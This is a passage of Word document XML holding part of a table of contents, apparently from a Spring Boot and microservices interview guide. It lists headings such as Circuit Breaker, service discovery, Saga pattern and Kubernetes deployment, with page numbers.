            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308146 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>882</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="75A5589E" w14:textId="585ED32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4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SpringBootTest used for?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308147 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>884</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="63458C59" w14:textId="63E678D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4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do you configure multiple environments (dev, prod)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308148 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>886</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E262259" w14:textId="781083D2" w:rsidR="00012799" w:rsidRDefault="00012799">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308149" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Microservices</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308149 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>888</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18009F61" w14:textId="459D13C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5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Monolithic &amp; Microservices and when to choose which?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308150 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>888</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6AEF0734" w14:textId="0A83B42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5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design a microservice from scratch?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308151 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>889</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6EF45438" w14:textId="238FE94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5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API Gateway pattern and its advantages?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308152 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>890</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E4FCBC6" w14:textId="0363A18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5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Inter-service communication: REST vs Messaging?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308153 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>892</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="46494644" w14:textId="3D45C06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5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Circuit Breaker pattern and its implementation using Resilience4j?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308154 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>893</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="041988A8" w14:textId="315E55C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5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Load balancing in microservices using Spring Cloud Load Balancer?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308155 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>894</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="629C425C" w14:textId="33AF966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5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Spring Cloud Config helps in centralized configuration management?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308156 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>896</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1FAABF81" w14:textId="70512E0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5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Service discovery using Eureka or Consul?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308157 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>898</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="748189E8" w14:textId="039FCB4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5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Feign Client vs WebClient: Which one to use and why?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308158 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>901</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="28948584" w14:textId="435AC5B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5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vent-driven architecture and Kafka integration?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308159 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>903</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="64D2D2B9" w14:textId="4E81B3C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6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atabase per service vs Shared Database: Pros and cons?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308160 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>905</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06EADEC6" w14:textId="298E001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6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Saga Pattern for distributed transactions in microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308161 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>907</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B71040E" w14:textId="529AA24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6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handle security in an API Gateway?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308162 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>909</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39B57AC8" w14:textId="4138F79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6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Observability: Logging, tracing, and monitoring best practices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308163 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>912</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="02342181" w14:textId="3BD08E5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6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Role of Prometheus and Grafana in microservices monitoring?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308164 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>914</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24F5F2FC" w14:textId="599FD7D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6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Kubernetes deployment strategies for microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308165 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>916</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0A776BF8" w14:textId="52BE544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6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Blue-Green and Canary deployments in microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308166 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>919</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2275B8FA" w14:textId="0C386E0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6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en to use WebFlux for reactive microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308167 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>922</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="194604EC" w14:textId="7BA9D6C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6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CQRS and Event Sourcing: When and why to use them?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308168 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>923</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E378AC2" w14:textId="0104DB4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6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Microservices architecture?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308169 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>925</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23D2F0B9" w14:textId="136A2B4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7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ere are you deploying your microservice?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308170 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>928</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E699E2E" w14:textId="0296F93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7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are different Aggregation patterns in Microservices?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
